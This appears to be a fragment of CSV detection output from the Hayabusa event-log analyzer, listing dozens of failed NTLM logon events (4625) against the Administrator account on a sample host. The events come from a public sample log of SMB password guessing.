+2016-09-20 01:51:21.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XvpDKRAPDS36sqNL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4cqJKEIySxiQdCRD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Pm1F7QEwBE054ui0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RvIjhyfdlXiX72Es  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dJilW4KgIEeh5VNr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2Ka0FYYdVOj90l0L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.715 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B9ZjGE8T6RuGx8SZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nkti4BGVrpoAQRBL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fZy2YJPOg1YZ2bd0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rUE6E9H9i0l0P7Jp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0Pkpt2nmRorQ3x0o  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hCZNNzSyi4mLLaxZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O9ZqF43sDjSirvMK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XOw9DjHISDX57XUe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rmxFpEQeGsgbXpDy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MfIVCOOWQS7TNKQA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uweLaLhvznDee1IF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oNQcS2BonF12ikiX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.265 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: D43Flf2keSL3aph6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.307 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zw7nJXNHZ2QNa3In  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UZp4567BIWAwxF9r  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: S9iVvPuykq62pV9z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eRVomETC34InuKPk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VpHfjKgAxChSYz8R  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tIbTy5IDRy90lbUR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mM6Olq0zYkMlwmrb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mUehtGEh0EqRHiLP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EhZ2KHmCTonGrXSS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NZea5qiet7vrT3iv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aNWY8kuJMSy8h0Zk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Bt9DUQ0mwhkJlTt8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zXYtsM2MMuNSYtVr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WgzvsdMN2SU7Knlh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DxiBYXNCY32yNb6L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cVfJmOxvsp75g3a0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uHp1hlHjD8w3WKt3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dEeJWAJgOeueYSM9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tOfPGoUXu932L80d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NbH4R6GK1PIVT3ij  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PgsJokRd07Nh1lO1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 11ylyxQyV5HCJ18g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.322 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Am2qI1ya4wYdqErV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5o2AmZsYUYmDpWZE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c0Hd8xWxOxFifJBG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hlh64Gtfoig2uzOY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.522 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LtK8Hj2kf3dfFSnW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VKUPqxtNqkVqXgTg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SKSxp87CBg8L8wSi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CpvxvR0ftQs1gdEF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: U9RGDzNMt9fM6rLF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RvOO9NLhbbKJXQq9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mDB9bIx7LcoJ6IAU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pfJWsGqlQTmFUUPT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9PRIO3MASsjrdQGs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: P9QCn4nZHB0ENeA1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4iUNHB1gE2d1dBfZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tM3IdtrLdVXQjOjB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Dbmn9Er9e1JZZybc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.102 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SY40ARcAoo9cWQIP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.139 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Fc7m0blzidQfn1BU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 13SkGPbDDXou7qLA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2YIlJeZpJlvcKgqt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BRhH6atcwLcGmrB4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BGIInLsy4UCfl0oW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4qJ7nEN0u9DkVuVH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6qb85lEENmrj4ebF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q6RXAj26rnxMmxuL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tas7cqRNGQw6FlVX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FQlF8GYIeWytFLsJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Dj48ftx52s1HntRT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B46vTS9PxUgUblBp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.770 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eoIFbywJEC0QaceV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
